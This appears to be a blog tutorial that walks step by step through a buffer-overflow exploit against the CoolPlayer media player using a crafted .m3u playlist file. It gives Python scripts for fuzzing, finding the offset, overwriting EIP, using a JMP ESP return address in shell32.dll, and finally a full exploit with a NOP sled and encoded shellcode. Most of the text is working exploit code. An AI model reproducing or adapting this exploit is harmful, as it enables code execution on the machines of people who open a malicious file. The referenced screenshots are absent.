myfile="cool.m3u"
myjunk="\x41" * 500
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()
and tehn , running Coolplayer and olldbg, load file "cool.m3u" and the Crash.. look register IP in ollydbg overwrite
Cek In SEH Chain, and this result and the press Shift + F9
2. you make pattern offset, and copy result pattern offset on this file fuzzer
become :
myfile="cool.m3u"
myjunk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7
Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8A
d9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7
Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8
Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak
3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am
5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5A
o6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()
do running coolplayer and olldbg, load do fuzzing, and this result value EIP
3. do DEADBEEF for check, before check deadbeef , make a pattern offset
edit our file fuzzer, become
myfile="cool.m3u"
myjunk="\x90" * 260
myjunk+="\xEF\xBE\xAD\xDE"
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()
and this result
choose Execute Modules , in here i use shell32.dll -double click in shell32.dll.. and the right click- search for -comand, type JSM ESP..
and this result
and press shift+ F9 for checking stack , and this result
5. Edit your file fuzzer, to get the calculator to prove that the correct offset pattern.. open browser and click 127.0.0.1:55555, choose payload-windows execute command, as a below
#!/usr/bin/python
myfile="cool.m3u"
myjunk="\x90" * 260
myjunk+="\xD7\x30\x9D\x7C"
myjunk+="\x90" * 16
myjunk+=("\xdb\xdc\xb8\x76\x35\x3c\x23\x2b\xc9\xb1\x23\xd9\x74\x24\xf4\x5f"
"\x83\xef\xfc\x31\x47\x13\x03\x31\x26\xde\xd6\x41\xa0\x5a\x19\xb9"
"\x31\xe8\x5c\x85\xba\x92\x5b\x8d\xbd\x85\xef\x22\xa6\xd2\xaf\x9c"
"\xd7\x0f\x06\x57\xe3\x44\x98\x89\x3d\x9b\x02\xf9\xba\xdb\x41\x06"
"\x02\x11\xa4\x09\x46\x4d\x43\x32\x12\xb6\xa8\x31\x7f\x3d\xef\x9d"
"\x7e\xa9\x76\x56\x8c\x66\xfc\x37\x91\x79\xe9\x4c\xb5\xf2\xec\xb9"
"\x4f\x58\xcb\x39\x93\x50\xd3\x25\x98\xd3\xe3\x20\x5e\xab\x0f\xa1"
"\x1f\x40\x9b\xc5\x83\xf5\x10\x4d\xb4\xee\x2e\x06\x44\x40\x30\x18"
"\x45\x2a\x59\x24\x1a\x1d\x6c\x34\xf2\xd4\x68\x37\x3a\x9d\xd8\x5f"
"\x4b\xe8\xdd\xc0\xc3\x75\x23\x74\x1d\xd1\x23\x6f\x41\xbc\xb7\x0c"
"\x86")
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()
running coolplayer and the load file fuzzer before his, and then this result
Tidak ada komentar:
Posting Komentar